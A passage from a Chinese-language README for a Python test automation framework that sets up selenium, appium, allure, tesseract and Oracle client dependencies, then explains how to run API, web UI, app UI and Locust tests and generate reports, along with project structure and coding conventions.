\u3010pgmagick\u6240\u9700\u4f9d\u8d56\u3011\n* Linux-CentOS:\n * yum install python3-devel postgresql-devel \u3010\u7528\u4e8epsycopg2-binary\u6240\u9700\u4f9d\u8d56\u3011\n * yum install GraphicsMagick-c++-devel boost boost-devel\u3010\u7528\u4e8epgmagick\u6240\u9700\u4f9d\u8d56\u3011\n* Windows:\n * \u5b89\u88c5Microsoft Visual C++ 2019 Redistributable\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://visualstudio.microsoft.com/zh-hans/downloads/ \u3010jpype1\u3001\u56fe\u50cf\u8bc6\u522b\u5b57\u5e93\u6240\u9700\u4f9d\u8d56\u3011\n\n#### 
1.2\u3001\u5b89\u88c5python\u4f9d\u8d56\u6a21\u5757\n* pip3 install -r requirements.txt\n* \u5b89\u88c5pgmagick\n * Linux:\n * pip3 install pgmagick==0.7.6\n * Windows:\n * \u4e0b\u8f7d\u5b89\u88c5\u5bf9\u5e94\u7248\u672c\uff1ahttps://www.lfd.uci.edu/~gohlke/pythonlibs/#pgmagick\n* \u5b89\u88c5xmind-sdk-python\n * \u4e0b\u8f7d\u5730\u5740:https://github.com/xmindltd/xmind-sdk-python\n\n#### 1.3\u3001\u5b89\u88c5allure\n* \u6e90\u5b89\u88c5\n * sudo apt-add-repository ppa:qameta/allure\n * sudo apt-get update \n * sudo apt-get install allure\n * \u5176\u4ed6\u5b89\u88c5\u65b9\u5f0f\uff1ahttps://github.com/allure-framework/allure2\n* \u624b\u52a8\u5b89\u88c5\n * \u4e0b\u8f7d2.7.0\u7248\u672c:https://github.com/allure-framework/allure2/releases\n * \u89e3\u538ballure-2.7.0.zip\n * \u52a0\u5165\u7cfb\u7edf\u73af\u5883\u53d8\u91cf:export PATH=/home/john/allure-2.7.0/bin:$PATH\n\n#### 1.4\u3001\u5b89\u88c5openjdk8\u6216jdk8\n* sudo add-apt-repository ppa:openjdk-r/ppa\n* sudo apt-get update\n* sudo apt-get install openjdk-8-jdk\n\n#### 1.5\u3001\u5b89\u88c5maven\n* \u5b8c\u6210maven\u7684\u5b89\u88c5\u914d\u7f6e\n\n#### 1.6\u3001\u5b89\u88c5Oracle Instant Client\n* Linux\n * \u5b89\u88c5libaio\u5305\n * Linux-CentOS:yum install libaio\n * Linux-Ubuntu:apt-get install libaio1\n * \u914d\u7f6eOracle Instant Client\n * \u4e0b\u8f7d\u5730\u5740:http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html\n * \u4e0b\u8f7d\u5b89\u88c5\u5305instantclient-basic-linux.x64-18.3.0.0.0dbru.zip\n * \u89e3\u538bzip\u5305,\u5e76\u914d\u7f6e/etc/profile\n * unzip instantclient-basic-linux.x64-18.3.0.0.0dbru.zip\n * export LD_LIBRARY_PATH=/home/john/oracle_instant_client/instantclient_18_3:$LD_LIBRARY_PATH\n * \u4e2d\u6587\u7f16\u7801\u8bbe\u7f6e\n \n ```python \n import os\n os.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'\n ```\n* Windows\n * \u4e0b\u8f7d\u5730\u5740:http://www.oracle.com/technetwork/topics/winx64soft-089540.html\n * \u4e0b\u8f7d\u5b89\u88c5\u5305instantclient-basic-windows.x64-11.2.0.4.0.zip\n * \u89e3\u538bzip\u5305,\u5e76\u914d\u7f6e\u73af\u5883\u53d8\u91cf\n * \u7cfb\u7edf\u73af\u5883\u53d8\u91cf\u52a0\u5165D:\\instantclient-basic-windows.x64-11.2.0.4.0\\instantclient_11_2\n * \u914d\u7f6e\u4e2d\u6587\u7f16\u7801,\u73af\u5883\u53d8\u91cf\u521b\u5efaNLS_LANG=SIMPLIFIED CHINESE_CHINA.UTF8 \n * \u6ce8\u610f:\u5982\u679c\u4f7f\u752864\u4f4d,python\u548cinstantclient\u90fd\u9700\u8981\u4f7f\u752864\u4f4d\n\n#### 1.7\u3001\u56fe\u50cf\u8bc6\u522b\u5b57\u5e93\u51c6\u5907\n* \u4e0b\u8f7d\u5bf9\u5e94\u5b57\u5e93:https://github.com/tesseract-ocr/tessdata\n* \u5c06\u4e0b\u8f7d\u7684\u5b57\u5e93\u653e\u5230common/java/lib/tess4j/tessdata/\n* Linux\n * \u5b89\u88c5\u4f9d\u8d56\n * Linux-Ubuntu:sudo apt install pkg-config aclocal libtool automake libleptonica-dev\n * Linux-CentOS:yum install autoconf automake libtool libjpeg-devel libpng-devel libtiff-devel zlib-devel\n * \u5b89\u88c5leptonica\uff0c\u4e0b\u8f7dleptonica-1.78.0.tar.gz\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://github.com/DanBloomberg/leptonica/releases\n * \u5b89\u88c5\u6b65\u9aa4\u540ctesseract-ocr\u7684\u5b89\u88c5\n * \u4fee\u6539/etc/profile\u6dfb\u52a0\u5982\u4e0b\u5185\u5bb9\uff0c\u7136\u540esource\n ```\n export LD_LIBRARY_PATH=$LD_LIBRARY_PAYT:/usr/local/lib\n export LIBLEPT_HEADERSDIR=/usr/local/include\n export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig\n ```\n * 
\u5b89\u88c5tesseract-ocr\uff0c\u4e0b\u8f7dtesseract-4.1.1.tar.gz\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://github.com/tesseract-ocr/tesseract/releases\n * ./autogen.sh\n * ./configure\n * sudo make\n * sudo make install\n * sudo ldconfig\n* Windows\n * \u5b89\u88c5Microsoft Visual C++ 2019 Redistributable\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://visualstudio.microsoft.com/zh-hans/downloads/\n\n### 2\u3001selenium server\u8fd0\u884c\u73af\u5883\u51c6\u5907\n#### 2.1\u3001\u5b89\u88c5jdk1.8,\u5e76\u914d\u7f6e\u73af\u5883\u53d8\u91cf\n* export JAVA_HOME=/usr/lib/jvm/jdk8\n* export JRE_HOME=${JAVA_HOME}/jre \n* export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib\n* export PATH=${JAVA_HOME}/bin:$PATH\n\n#### 2.2\u3001\u5b89\u88c5\u914d\u7f6eselenium\n* \u914d\u7f6eselenium server\n * \u4e0b\u8f7dselenium-server-standalone-3.141.0.jar\n * \u4e0b\u8f7d\u5730\u5740:http://selenium-release.storage.googleapis.com/index.html\n * \u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u542f\u52a8\u670d\u52a1:java -jar selenium-server-standalone-3.141.0.jar -log selenium.log\n* \u4e0b\u8f7d\u6d4f\u89c8\u5668\u9a71\u52a8\n * \u8c37\u6b4c\u6d4f\u89c8\u5668\uff1ahttps://chromedriver.storage.googleapis.com/index.html\n * \u9a71\u52a8\u652f\u6301\u7684\u6700\u4f4e\u6d4f\u89c8\u5668\u7248\u672c\uff1ahttps://raw.githubusercontent.com/appium/appium-chromedriver/master/config/mapping.json\n * \u706b\u72d0\u6d4f\u89c8\u5668\uff1ahttps://github.com/mozilla/geckodriver/\n * \u9a71\u52a8\u652f\u6301\u7684\u6d4f\u89c8\u5668\u7248\u672c\uff1ahttps://firefox-source-docs.mozilla.org/testing/geckodriver/geckodriver/Support.html\n * IE\u6d4f\u89c8\u5668(\u5efa\u8bae\u4f7f\u752832\u4f4d,64\u4f4d\u64cd\u4f5c\u6781\u6162)\uff1ahttp://selenium-release.storage.googleapis.com/index.html\n * \u5c06\u9a71\u52a8\u6240\u5728\u76ee\u5f55\u52a0\u5165\u5230selenium server\u670d\u52a1\u5668\u7cfb\u7edf\u73af\u5883\u53d8\u91cf:export PATH=/home/john/selenium/:$PATH\n* IE\u6d4f\u89c8\u5668\u8bbe\u7f6e\n * \u5728Windows Vista\u3001Windows7\u7cfb\u7edf\u4e0a\u7684IE\u6d4f\u89c8\u5668\u5728IE7\u53ca\u4ee5\u4e0a\u7248\u672c\u4e2d\uff0c\u9700\u8981\u8bbe\u7f6e\u56db\u4e2a\u533a\u57df\u7684\u4fdd\u62a4\u6a21\u5f0f\u4e3a\u4e00\u6837\uff0c\u8bbe\u7f6e\u5f00\u542f\u6216\u8005\u5173\u95ed\u90fd\u53ef\u4ee5\u3002\n * \u5de5\u5177-->Internet\u9009\u9879-->\u5b89\u5168\n * IE10\u53ca\u4ee5\u4e0a\u7248\u672c\u589e\u5f3a\u4fdd\u62a4\u6a21\u5f0f\u9700\u8981\u5173\u95ed\u3002\n * \u5de5\u5177-->Internet\u9009\u9879-->\u9ad8\u7ea7\n * \u6d4f\u89c8\u5668\u7f29\u653e\u7ea7\u522b\u5fc5\u987b\u8bbe\u7f6e\u4e3a100%\uff0c\u4ee5\u4fbf\u672c\u5730\u9f20\u6807\u4e8b\u4ef6\u53ef\u4ee5\u8bbe\u7f6e\u4e3a\u6b63\u786e\u7684\u5750\u6807\u3002\n * \u9488\u5bf9IE11\u9700\u8981\u8bbe\u7f6e\u6ce8\u518c\u8868\u4ee5\u4fbf\u4e8e\u6d4f\u89c8\u5668\u9a71\u52a8\u4e0e\u6d4f\u89c8\u5668\u5efa\u7acb\u8fde\u63a5\n * Windows 64\u4f4d\uff1aHKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BFCACHE\n * Windows 32\u4f4d\uff1aHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BFCACHE\n * \u5982\u679cFEATRUE_BFCACHE\u9879\u4e0d\u5b58\u5728\uff0c\u9700\u8981\u521b\u5efa\u4e00\u4e2a\uff0c\u7136\u540e\u5728\u91cc\u9762\u521b\u5efa\u4e00\u4e2aDWORD(32\u4f4d)\uff0c\u547d\u540d\u4e3aiexplore.exe\uff0c\u503c\u4e3a0\n * Windows 64\u4f4d\u4e24\u4e2a\u6ce8\u518c\u8868\u5efa\u8bae\u90fd\u8bbe\u7f6e\n * 
IE8\u53ca\u4ee5\u4e0a\u7248\u672c\u8bbe\u7f6e\u652f\u6301inprivate\u6a21\u5f0f\uff0c\u4ee5\u4fbf\u591a\u5f00IE\u7a97\u53e3\u65f6cookies\u80fd\u591f\u72ec\u4eab\n * HKKY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main \u4e0b\u5efa\u4e00\u4e2a\u540d\u4e3aTabProcGrowth\u7684DWORD(32\u4f4d)\uff0c\u503c\u4e3a0\n * \u91cd\u542f\u7cfb\u7edf\n * \u6ce8:https://github.com/SeleniumHQ/selenium/wiki/InternetExplorerDriver#required-configuration\n\n### 3\u3001appium server\u8fd0\u884c\u73af\u5883\u51c6\u5907\n#### 3.1\u3001\u5b89\u88c5jdk1.8,\u5e76\u914d\u7f6e\u73af\u5883\u53d8\u91cf\n* export JAVA_HOME=/usr/lib/jvm/jdk8\n* export JRE_HOME=${JAVA_HOME}/jre \n* export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib\n* export PATH=${JAVA_HOME}/bin:$PATH\n\n#### 3.2\u3001\u5b89\u88c5\u914d\u7f6eappium server\n* \u5b89\u88c5appium desktop server\n * \u4e0b\u8f7dAppium-windows-1.15.1.exe\n * \u4e0b\u8f7d\u5730\u5740:https://github.com/appium/appium-desktop/releases\n * \u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u542f\u52a8\u670d\u52a1\n\n* Android\u73af\u5883\u51c6\u5907\n * \u5b89\u88c5java(JDK),\u5e76\u914d\u7f6eJAVA_HOME=/usr/lib/jvm/jdk8\n * \u5b89\u88c5Android SDK,\u5e76\u914d\u7f6eANDROID_HOME=\"/usr/local/adt/sdk\"\n * \u4f7f\u7528SDK manager\u5b89\u88c5\u9700\u8981\u8fdb\u884c\u81ea\u52a8\u5316\u7684Android API\u7248\u672c\n \n* IOS\u73af\u5883\u51c6\u5907\n * \u7531\u4e8e\u6d4b\u8bd5IOS\u771f\u5b9e\u8bbe\u5907\u6ca1\u529e\u6cd5\u76f4\u63a5\u64cd\u4f5cweb view\uff0c\u9700\u8981\u901a\u8fc7usb\uff0c\u5b9e\u73b0\u901a\u8fc7usb\u521b\u5efa\u8fde\u63a5\u9700\u8981\u5b89\u88c5ios-webkit-debug-proxy\n * \u4e0b\u8f7d\u5b89\u88c5\u5730\u5740\uff1ahttps://github.com/google/ios-webkit-debug-proxy/tree/v1.8.5\n\n* \u624b\u673achrome\u73af\u5883\u51c6\u5907\n * \u786e\u4fdd\u624b\u673a\u5df2\u5b89\u88c5chrome\u6d4f\u89c8\u5668\n * \u4e0b\u8f7dchrome\u6d4f\u89c8\u5668\u9a71\u52a8\uff1ahttps://chromedriver.storage.googleapis.com/index.html\n * \u9a71\u52a8\u652f\u6301\u7684\u6700\u4f4e\u6d4f\u89c8\u5668\u7248\u672c\uff1ahttps://raw.githubusercontent.com/appium/appium-chromedriver/master/config/mapping.json\n * \u5728appium desktop\u4e0a\u8bbe\u7f6e\u9a71\u52a8\u7684\u8def\u5f84\n\n* \u6df7\u5408\u5e94\u7528\u73af\u5883\u51c6\u5907\n * \u65b9\u6cd5\u4e00\uff1a\u5b89\u88c5TBS Studio\u5de5\u5177\u67e5\u770bwebview\u5185\u6838\u7248\u672c\uff1ahttps://x5.tencent.com/tbs/guide/debug/season1.html\n * \u65b9\u6cd5\u4e8c\uff1a\u6253\u5f00\u5730\u5740\uff08\u8be5\u5730\u5740\u5728uc\u5f00\u53d1\u5de5\u5177\u4e2d\u53ef\u67e5\u5230\uff09\u67e5\u770bwebview\u5185\u6838\u7248\u672c\uff1ahttps://liulanmi.com/labs/core.html\n * \u4e0b\u8f7dwebview\u5185\u6838\u5bf9\u5e94\u7684chromedriver\u7248\u672c\uff1ahttps://chromedriver.storage.googleapis.com/index.html\n * \u914d\u7f6e\u6587\u4ef6\u8fdb\u884c\u9a71\u52a8\u8def\u5f84\u7684\u914d\u7f6e\n * \u6ce8\uff1awebview\u9700\u8981\u5f00\u542fdebug\u6a21\u5f0f\n\n* Windows\u73af\u5883\u51c6\u5907\n * \u652f\u6301Windows10\u53ca\u4ee5\u4e0a\u7248\u672c\n * \u8bbe\u7f6eWindows\u5904\u4e8e\u5f00\u53d1\u8005\u6a21\u5f0f\n * \u4e0b\u8f7dWinAppDriver\u5e76\u5b89\u88c5(V1.1\u7248\u672c),https://github.com/Microsoft/WinAppDriver/releases\n * \\[\u53ef\u9009\\]\u4e0b\u8f7d\u5b89\u88c5WindowsSDK,\u5728Windows Kits\\10\\bin\\10.0.17763.0\\x64\u5185\u5305\u542b\u6709inspect.exe\u7528\u4e8e\u5b9a\u4f4dWindows\u7a0b\u5e8f\u7684\u5143\u7d20\u4fe1\u606f\n\n* \u5176\u4ed6\u66f4\u591a\u914d\u7f6e\uff1ahttps://github.com/appium/appium/tree/v1.15.1/docs/en/drivers\n\n## 
\u4e8c\u3001\u4fee\u6539\u914d\u7f6e\n* vim config/app_ui_config.conf \u914d\u7f6eapp ui\u81ea\u52a8\u5316\u7684\u6d4b\u8bd5\u4fe1\u606f\n* vim config/web_ui_config.conf \u914d\u7f6eweb ui\u81ea\u52a8\u5316\u7684\u6d4b\u8bd5\u4fe1\u606f\n* vim config/projectName/projectName.conf \u914d\u7f6e\u6d4b\u8bd5\u9879\u76ee\u7684\u4fe1\u606f\n* \u4fee\u6539\u6027\u80fd\u6d4b\u8bd5\u8d1f\u8f7d\u673a\u7684\u7cfb\u7edf\u6700\u5927\u6253\u5f00\u6587\u4ef6\u6570,\u907f\u514d\u5e76\u53d1\u7528\u6237\u6570\u5927\u4e8e\u6700\u5927\u6253\u5f00\u6587\u4ef6\u6570\n\n## \u4e09\u3001\u8fd0\u884c\u6d4b\u8bd5\n### 1\u3001API\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u run_api_test.py --help\n* python3 -u run_api_test.py \u8fd0\u884ccases/api/\u76ee\u5f55\u6240\u6709\u7684\u7528\u4f8b\n* python3 -u run_api_test.py -k keyword \u8fd0\u884c\u5339\u914d\u5173\u952e\u5b57\u7684\u7528\u4f8b\uff0c\u4f1a\u5339\u914d\u6587\u4ef6\u540d\u3001\u7c7b\u540d\u3001\u65b9\u6cd5\u540d\n* python3 -u run_api_test.py -d dir \u8fd0\u884c\u6307\u5b9a\u76ee\u5f55\u7684\u7528\u4f8b\uff0c\u9ed8\u8ba4\u8fd0\u884ccases/api/\u76ee\u5f55\n* python3 -u run_api_test.py -m mark \u8fd0\u884c\u6307\u5b9a\u6807\u8bb0\u7684\u7528\u4f8b\n\n### 2\u3001web ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u run_web_ui_test.py --help\n* python3 -u run_web_ui_test.py \u8fd0\u884ccases/web_ui/\u76ee\u5f55\u6240\u6709\u7684\u7528\u4f8b\n* python3 -u run_web_ui_test.py -k keyword \u8fd0\u884c\u5339\u914d\u5173\u952e\u5b57\u7684\u7528\u4f8b\uff0c\u4f1a\u5339\u914d\u6587\u4ef6\u540d\u3001\u7c7b\u540d\u3001\u65b9\u6cd5\u540d\n* python3 -u run_web_ui_test.py -d dir \u8fd0\u884c\u6307\u5b9a\u76ee\u5f55\u7684\u7528\u4f8b\uff0c\u9ed8\u8ba4\u8fd0\u884ccases/web_ui/\u76ee\u5f55\n* python3 -u run_web_ui_test.py -m mark \u8fd0\u884c\u6307\u5b9a\u6807\u8bb0\u7684\u7528\u4f8b\n\n### 3\u3001app ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u run_app_ui_test.py --help\n* python3 -u run_app_ui_test.py \u8fd0\u884ccases/app_ui/\u76ee\u5f55\u6240\u6709\u7684\u7528\u4f8b\n* python3 -u run_app_ui_test.py -tt phone -k keyword \u8fd0\u884c\u5339\u914d\u5173\u952e\u5b57\u7684\u7528\u4f8b\uff0c\u4f1a\u5339\u914d\u6587\u4ef6\u540d\u3001\u7c7b\u540d\u3001\u65b9\u6cd5\u540d\n* python3 -u run_app_ui_test.py -tt phone -d dir \u8fd0\u884c\u6307\u5b9a\u76ee\u5f55\u7684\u7528\u4f8b\uff0c\u9ed8\u8ba4\u8fd0\u884ccases/app_ui/\u76ee\u5f55\n* python3 -u run_app_ui_test.py -m mark \u8fd0\u884c\u6307\u5b9a\u6807\u8bb0\u7684\u7528\u4f8b\n\n### 4\u3001\u6027\u80fd\u6d4b\u8bd5\n* cd AutomationTest/\n* ./start_locust_master.sh\n* ./start_locust_slave.sh\n\n## \u56db\u3001\u751f\u6210\u6d4b\u8bd5\u62a5\u544a\n### 1\u3001API\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u generate_api_test_report.py -p 9080 \n* \u8bbf\u95ee\u5730\u5740http://ip:9080\n* \u5728\u4f7f\u7528Ubuntu\u8fdb\u884c\u62a5\u544a\u751f\u6210\u65f6\uff0c\u8bf7\u52ff\u4f7f\u7528sudo\u6743\u9650\uff0c\u5426\u5219\u65e0\u6cd5\u751f\u6210\uff0callure\u4e0d\u652f\u6301\n\n### 2\u3001web ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u generateReport_web_ui_test_report.py -ieport 9081 -chromeport 9082 -firefoxport 9083\n* \u8bbf\u95ee\u5730\u5740http://ip:908[1-3]\n* \u5728\u4f7f\u7528Ubuntu\u8fdb\u884c\u62a5\u544a\u751f\u6210\u65f6\uff0c\u8bf7\u52ff\u4f7f\u7528sudo\u6743\u9650\uff0c\u5426\u5219\u65e0\u6cd5\u751f\u6210\uff0callure\u4e0d\u652f\u6301\n\n### 3\u3001app ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u generateReport_app_ui_test_report.py -sp 9084\n* \u8bbf\u95ee\u5730\u5740http://ip:9084\n\n### 
\u6ce8\uff1a\u5728\u4f7f\u7528Ubuntu\u8fdb\u884c\u62a5\u544a\u751f\u6210\u65f6\uff0c\u8bf7\u52ff\u4f7f\u7528sudo\u6743\u9650\uff0c\u5426\u5219\u65e0\u6cd5\u751f\u6210\uff0callure\u4e0d\u652f\u6301\n\n## \u4e94\u3001\u9879\u76ee\u8bf4\u660e\n### 1\u3001API\u6d4b\u8bd5\n* \u9879\u76ee\n * demoProject \u4f8b\u5b50\u9879\u76ee\n \n### 2\u3001web ui\u6d4b\u8bd5\n* \u5143\u7d20\u7684\u663e\u5f0f\u7b49\u5f85\u65f6\u95f4\u9ed8\u8ba4\u4e3a30s\n* \u5c01\u88c5\u7684\u663e\u5f0f\u7b49\u5f85\u7c7b\u578b\u652f\u6301:page_objects/web_ui/wait_type.py\n* \u5c01\u88c5\u7684\u5b9a\u4f4d\u7c7b\u578b\u652f\u6301:page_objects/web_ui/locator_type.py\n* \u9ed8\u8ba4\u4f7f\u75284\u4e2aworker\u8fdb\u884c\u5e76\u884c\u6d4b\u8bd5\n* \u6587\u4ef6\u4e0b\u8f7d\u5904\u7406\u6682\u4e0d\u652f\u6301ie\u6d4f\u89c8\u5668\n* \u65e0\u5934\u6d4f\u89c8\u5668\u6682\u4e0d\u652f\u6301ie\u6d4f\u89c8\u5668\n* \u9879\u76ee\n * demoProject \u4f8b\u5b50\u9879\u76ee\n \n### 3\u3001app ui\u6d4b\u8bd5\n* \u5143\u7d20\u7684\u663e\u5f0f\u7b49\u5f85\u65f6\u95f4\u9ed8\u8ba4\u4e3a30s\n* \u5c01\u88c5\u7684\u663e\u5f0f\u7b49\u5f85\u7c7b\u578b\u652f\u6301:page_objects/app_ui/wait_type.py\n* \u5c01\u88c5\u7684\u5b9a\u4f4d\u7c7b\u578b\u652f\u6301:page_objects/app_ui/locator_type.py\n* \u9879\u76ee\n * android \n * demoProject \u4f8b\u5b50\u9879\u76ee\n\n# [\u9879\u76ee\u7ed3\u6784]()\n* base \u57fa\u7840\u8bf7\u6c42\u7c7b\n* cases \u6d4b\u8bd5\u7528\u4f8b\u76ee\u5f55\n* common \u516c\u5171\u6a21\u5757\n* common_projects \u6bcf\u4e2a\u9879\u76ee\u7684\u516c\u5171\u6a21\u5757\n* config\u3000\u914d\u7f6e\u6587\u4ef6\n* init \u521d\u59cb\u5316\n* logs \u65e5\u5fd7\u76ee\u5f55\n* output \u6d4b\u8bd5\u7ed3\u679c\u8f93\u51fa\u76ee\u5f55 \n* packages app ui\u6d4b\u8bd5\u7684\u5b89\u88c5\u5305\n* page_objects \u9875\u9762\u6620\u5c04\u5bf9\u8c61\n* pojo \u5b58\u653e\u81ea\u5b9a\u4e49\u7c7b\u5bf9\u8c61\n* test_data \u6d4b\u8bd5\u6240\u9700\u7684\u6d4b\u8bd5\u6570\u636e\u76ee\u5f55\n* run_api_test.py \u8fd0\u884capi\u6d4b\u8bd5\u811a\u672c\n* run_web_ui_test.py \u8fd0\u884cweb ui\u6d4b\u8bd5\u811a\u672c\n* run_app_ui_test.py \u8fd0\u884capp ui\u6d4b\u8bd5\u811a\u672c\n* generate_api_test_report.py \u751f\u6210api\u6d4b\u8bd5\u62a5\u544a\n* generateReport_web_ui_test_report.py \u751f\u6210web ui\u6d4b\u8bd5\u62a5\u544a\n* generateReport_app_ui_test_report.py \u751f\u6210app ui\u6d4b\u8bd5\u62a5\u544a\n* start_locust_master.sh \u542f\u52a8locust\u4e3b\u8282\u70b9\n* start_locust_slave.sh \u542f\u52a8locust\u4ece\u8282\u70b9\n\n# [\u7f16\u7801\u89c4\u8303]()\n* \u7edf\u4e00\u4f7f\u7528python 3.6.8\n* \u7f16\u7801\u4f7f\u7528-\\*- coding:utf8 -\\*-,\u4e14\u4e0d\u6307\u5b9a\u89e3\u91ca\u5668\n* \u7c7b/\u65b9\u6cd5\u7684\u6ce8\u91ca\u5747\u5199\u5728class/def\u4e0b\u4e00\u884c\uff0c\u5e76\u4e14\u7528\u4e09\u4e2a\u53cc\u5f15\u53f7\u5f62\u5f0f\u6ce8\u91ca\n* \u5c40\u90e8\u4ee3\u7801\u6ce8\u91ca\u4f7f\u7528#\u53f7\n* \u6240\u6709\u4e2d\u6587\u90fd\u76f4\u63a5\u4f7f\u7528\u5b57\u7b26\u4e32\uff0c\u4e0d\u8f6c\u6362\u6210Unicode\uff0c\u5373\u4e0d\u662f\u7528\u3010u'\u4e2d\u6587'\u3011\u7f16\u5199\n* \u6240\u6709\u7684\u6d4b\u8bd5\u6a21\u5757\u6587\u4ef6\u90fd\u4ee5test_projectName_moduleName.py\u547d\u540d\n* \u6240\u6709\u7684\u6d4b\u8bd5\u7c7b\u90fd\u4ee5Test\u5f00\u5934\uff0c\u7c7b\u4e2d\u65b9\u6cd5(\u7528\u4f8b)\u90fd\u4ee5test_\u5f00\u5934\n* \u6bcf\u4e2a\u6d4b\u8bd5\u9879\u76ee\u90fd\u5728cases\u76ee\u5f55\u91cc\u521b\u5efa\u4e00\u4e2a\u76ee\u5f55\uff0c\u4e14\u76ee\u5f55\u90fd\u5305\u542b\u6709api\u3001scenrarios\u4e24\u4e2a\u76ee\u5f55\n* 
case\u5bf9\u5e94setup/teardown\u7684fixture\u7edf\u4e00\u547d\u540d\u6210fixture_[test_case_method_name]\n* \u6bcf\u4e00\u4e2a\u6a21\u5757\u4e2d\u6d4b\u8bd5\u7528\u4f8b\u5982\u679c\u6709\u987a\u5e8f\u8981\u6c42\u3010\u4e3b\u8981\u9488\u5bf9ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u3011\uff0c\u5219\u81ea\u4e0a\u800c\u4e0b\u6392\u5e8f\uff0cpytest\u5728\u5355\u4e2a\u6a21\u5757\u91cc\u4f1a\u81ea\u4e0a\u800c\u4e0b\u6309\u987a\u5e8f\u6267\u884c\n\n# [pytest\u5e38\u7528]()\n* @pytest.mark.skip(reason='\u8be5\u529f\u80fd\u5df2\u5e9f\u5f03')\n* @pytest.mark.parametrize('key1,key2',[(key1_value1,key2_value2),(key1_value2,key2_value2)])\n* @pytest.mark.usefixtures('func_name')\n\n# [\u6ce8\u610f\u70b9]()\n* \u8fd0\u884cpytest\u65f6\u6307\u5b9a\u7684\u76ee\u5f55\u5185\u5e94\u5f53\u6709conftest.py\uff0c\u65b9\u80fd\u5728\u5176\u4ed6\u6a21\u5757\u4e2d\u4f7f\u7528\u3002@allure.step\u4f1a\u5f71\u54cdfixture\uff0c\u6545\u5728\u811a\u672c\u4e2d\u4e0d\u4f7f\u7528@allure.step\n* \u7531\u4e8eweb ui\u914d\u7f6e\u7684\u9a71\u52a8\u662f\u76f4\u63a5\u8bbe\u7f6e\u5728\u7cfb\u7edf\u73af\u5883\u53d8\u91cf\uff0capp ui\u6307\u5b9a\u4e86\u6df7\u5408\u5e94\u7528\u7684\u6d4f\u89c8\u5668\u9a71\u52a8\uff0c\u5728\u8fd0\u884capp ui\u65f6appium\u6709\u53ef\u80fd\u4f1a\u8bfb\u53d6\u5230\u7cfb\u7edf\u7684\u73af\u5883\u53d8\u91cf\u7684\u914d\u7f6e\uff0c\u6545\u8fd0\u884c\u65f6\u8bf7\u6392\u67e5\u6b64\u60c5\u51b5\n* \u6570\u636e\u5e93\u64cd\u4f5c\uff0c\u6240\u6709\u8868\u64cd\u4f5c\u5747\u8fdb\u884c\u5355\u8868\u64cd\u4f5c\uff0c\u5982\u9700\u591a\u8868\u67e5\u8be2\uff0c\u4f7f\u7528\u4ee3\u7801\u8fdb\u884c\u805a\u5408\n* web ui\u6d4b\u8bd5\n * \u7edf\u4e00\u4f7f\u7528Firefox\u6d4f\u89c8\u5668\u8fdb\u884c\u5143\u7d20\u5b9a\u4f4d\n * \u80fd\u7528id\u3001name\u3001link(\u4e0d\u5e38\u53d8\u5316\u7684\u94fe\u63a5)\u5b9a\u4f4d\u7684\uff0c\u4e0d\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u80fd\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u4e0d\u4f7f\u7528xpath\u5b9a\u4f4d\n * \u9879\u76ee\u4f7f\u7528\u5e76\u53d1\u8fd0\u884c\uff0c\u6545\u7f16\u5199\u6d4b\u8bd5\u7528\u4f8b\u65f6\uff0c\u5e94\u8be5\u907f\u514d\u6a21\u5757\u4e0e\u6a21\u5757\u76f4\u63a5\u7684\u7528\u4f8b\u4f1a\u76f8\u4e92\u5f71\u54cd\u6d4b\u8bd5\u7ed3\u679c\n* app ui\u6d4b\u8bd5\n * \u80fd\u7528id\u3001name\u3001link(\u4e0d\u5e38\u53d8\u5316\u7684\u94fe\u63a5)\u5b9a\u4f4d\u7684\uff0c\u4e0d\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u80fd\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u4e0d\u4f7f\u7528xpath\u5b9a\u4f4d\n * \u5982\u9700\u8981\u4e0a\u4f20\u6587\u4ef6\u5230\u624b\u673a\u6216\u8005\u4ece\u624b\u673a\u4e0b\u8f7d\u6587\u4ef6\uff0c\u8bf7\u786e\u4fdd\u6709\u624b\u673a\u5bf9\u5e94\u76ee\u5f55\u7684\u8bfb\u5199\u6743\u9650\n * \u89c6\u9891\u5f55\u5236\u7edf\u4e00\u5bf9\u5355\u4e2a\u5355\u4e2acase\u8fdb\u884c\uff0c\u4fdd\u8bc1\u5f55\u5236\u65f6\u95f4\u4e0d\u8d85\u8fc73\u5206\u949f\uff0c\u4e14\u5f55\u5236\u6587\u4ef6\u4e0d\u8981\u8fc7\u5927\uff0c\u5426\u5219\u4f1a\u5f15\u8d77\u624b\u673a\u5185\u5b58\u65e0\u6cd5\u5b58\u50a8\u89c6\u9891\n * \u786e\u8ba4\u624b\u673a\u662f\u5426\u80fd\u8fdb\u884c\u89c6\u9891\u5f55\u5236\u6267\u884c\u547d\u4ee4adb shell screenrecord /sdcard/test.mp4\uff0c\u80fd\u6b63\u5e38\u6267\u884c\u5373\u53ef\n * 